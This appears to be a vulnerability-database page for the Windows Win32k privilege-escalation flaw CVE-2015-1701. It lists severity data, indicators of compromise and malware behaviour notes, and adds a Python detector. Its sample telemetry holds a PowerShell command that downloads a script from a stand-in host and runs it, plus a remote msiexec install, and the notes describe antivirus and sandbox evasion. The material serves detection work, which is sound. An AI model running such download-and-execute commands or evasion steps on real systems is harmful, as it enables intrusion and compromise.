CVE-2015-1701
published 2015-04-21


Priority: high (CVSS 3.1 base score 7.8, vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CISA Known Exploited Vulnerabilities catalog: listed, remediation due 2022-03-24
Exploited in the wild: yes
EPSS: 56.20% (98.9th percentile)
Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."

Affected (1 range)

Vendor | Product | Version range | Fixed in
microsoft | windows_2003_server | (not given) | (not given)

Note that the affected table lists only windows_2003_server, while the description names Windows Server 2003 SP2, Vista SP2 and Server 2008 SP2; treat the table as incomplete and rely on the vendor advisory for the full product list.

Detection & IOCs (extracted from sources)

filename: rdpinst.exe
registry: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SetupExecute
registry: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute
registry: \Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
path: ProgramData\update\
  • The malware issues direct system calls (INT 2Eh and CALL ntdll!KiFastSystemCall) to bypass user-mode hooks placed by AV and sandboxes; kernel-side telemetry still observes these calls, so detection should not rely on user-mode hooking alone.
  • Before terminating, the malware re-encrypts its string-literal region with RC4 to hinder memory-dump analysis; search memory for the RC4 key 'dqrChZonUF'.
  • The malware removes filter-driver registry entries before reboot so that AV drivers do not load early in the boot process; monitor for bulk deletion of filter-driver registry keys.
  • The Purple Fox exploit chain uses CVE-2015-1701 together with CVE-2018-8120 through an abused PowerSploit module when the current user lacks administrator rights; monitor for PowerSploit module execution followed by msiexec.exe download activity.
  • APT16 delivered a CVE-2015-1701 exploit through malicious Microsoft Word documents that exploited an EPS "dict copy" use-after-free; the resulting payloads were the IRONHALO downloader or the ELMER backdoor.
  • The malware checks two hard-coded MAC addresses and terminates if the host matches one; it also terminates if ZKTeco ZKAccess software is present. These anti-analysis checks can serve as behavioral detection triggers.
  • The SLUB backdoor issues commands to all infected hosts at once via a shared GitHub gist; the attacker cannot target individual machines, so command IOCs observed in the gist apply to every victim.
  • Analysts relying solely on sandbox solutions may miss the full functionality of the CVE-2015-1701 sample because of its extensive anti-sandboxing techniques; manual analysis or patching out the environment checks is required.
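As an added example (not code from the page's sources or from any vendor tool), the following Python turns the IOCs and behavioral notes above into a small matcher that runs over constructed Sysmon-style events and a constructed memory dump. It shows the details the list alone does not: registry keys arrive in both NT-native (\Registry\Machine\...) and Win32 (HKLM\...) spellings and must be normalized before comparison, the Purple Fox indicator is a sequence (PowerSploit use, then an msiexec.exe download on the same host) rather than a single match, and the filter-driver deletion indicator needs a count threshold. The event shape, the 600-second window, the Services\<driver>\Instances location used for filter-driver registrations, and the "three deletions" threshold are assumptions for illustration, not facts from the page.

```python
import re
from collections import defaultdict

# IOCs copied from the list above; everything else in this file is constructed.
IOC_FILENAMES = {"rdpinst.exe"}
IOC_REGISTRY_KEYS = {
    r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SetupExecute",
    r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute",
    r"\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
}
IOC_PATH_FRAGMENT = "\\programdata\\update\\"
RC4_KEY = b"dqrChZonUF"

# Assumptions (not from the page): minifilter registrations live under
# Services\<driver>\Instances, "bulk" means >= 3 such deletions on one host,
# and a PowerSploit -> msiexec chain completes within 600 seconds.
FILTER_INSTANCE_RE = re.compile(r"^hklm\\system\\currentcontrolset\\services\\[^\\]+\\instances")
BULK_DELETE_THRESHOLD = 3
WINDOW_SECONDS = 600


def normalize_key(key):
    """Fold NT-native and Win32 registry spellings into one lower-case form."""
    return key.lower().replace("\\registry\\machine", "hklm")


IOC_REGISTRY_NORMALIZED = {normalize_key(k) for k in IOC_REGISTRY_KEYS}


def find_rc4_key(memory_blob):
    """Offset of the hard-coded RC4 key in a memory dump, or -1 if absent."""
    return memory_blob.find(RC4_KEY)


def scan_events(events):
    """Return (rule, host, ts) tuples for every indicator hit, in time order."""
    findings = []
    powersploit_seen = defaultdict(list)   # host -> timestamps of PowerSploit use
    filter_deletes = defaultdict(list)     # host -> timestamps of Instances deletions
    for ev in sorted(events, key=lambda e: e["ts"]):
        host, ts, kind = ev["host"], ev["ts"], ev["type"]
        if kind == "file":
            path = ev["path"].lower()
            if path.rsplit("\\", 1)[-1] in IOC_FILENAMES:
                findings.append(("ioc_filename", host, ts))
            if IOC_PATH_FRAGMENT in path:
                findings.append(("ioc_path", host, ts))
        elif kind == "registry_set":
            if normalize_key(ev["key"]) in IOC_REGISTRY_NORMALIZED:
                findings.append(("ioc_registry", host, ts))
        elif kind == "registry_delete":
            if FILTER_INSTANCE_RE.match(normalize_key(ev["key"])):
                filter_deletes[host].append(ts)
                recent = [t for t in filter_deletes[host] if ts - t <= WINDOW_SECONDS]
                # '==' so the alert fires once when the threshold is crossed
                if len(recent) == BULK_DELETE_THRESHOLD:
                    findings.append(("bulk_filter_driver_delete", host, ts))
        elif kind == "process":
            cmd = ev["cmdline"].lower()
            image = ev["image"].lower()
            if "powersploit" in cmd:
                powersploit_seen[host].append(ts)
            if image.endswith("\\msiexec.exe") and "http" in cmd:
                if any(ts - t <= WINDOW_SECONDS for t in powersploit_seen[host]):
                    findings.append(("purple_fox_chain", host, ts))
    return findings


# Constructed sample telemetry (not real logs); ws02 is a benign control host.
SAMPLE_EVENTS = [
    {"ts": 1, "host": "ws01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10/PowerSploit/Privesc.ps1')"},
    {"ts": 2, "host": "ws01", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://192.0.2.10/update.msi /q"},
    {"ts": 3, "host": "ws01", "type": "file", "path": r"C:\ProgramData\update\rdpinst.exe"},
    {"ts": 4, "host": "ws01", "type": "registry_set",
     "key": r"\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"},
    {"ts": 5, "host": "ws01", "type": "registry_set",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute"},
    {"ts": 6, "host": "ws01", "type": "registry_delete",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\avfilter\Instances"},
    {"ts": 6, "host": "ws01", "type": "registry_delete",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\edrmon\Instances"},
    {"ts": 6, "host": "ws01", "type": "registry_delete",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\fltsrv\Instances"},
    {"ts": 7, "host": "ws02", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\setup\\app.msi /q"},
]
# Constructed memory dump: the key sits at offset 64 + len(b"config=") = 71.
SAMPLE_DUMP = b"\x00" * 64 + b"config=" + RC4_KEY + b"\x00" * 32

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
    print("rc4 key offset:", find_rc4_key(SAMPLE_DUMP))
```

The RC4 key search only works against a dump taken before the sample re-encrypts its string region at exit, which is why the note above pairs it with memory capture during execution rather than post-mortem. The sequence rule deliberately keys on the host, not the process, because the page describes the chain across PowerSploit and a separate msiexec.exe process.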

CVSS provenance

Source | CVSS version | Score | Severity | Vector
nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck | (not given) | 7.8 | HIGH | (not given)
cisa | (not given) | 7.8 | HIGH | (not given)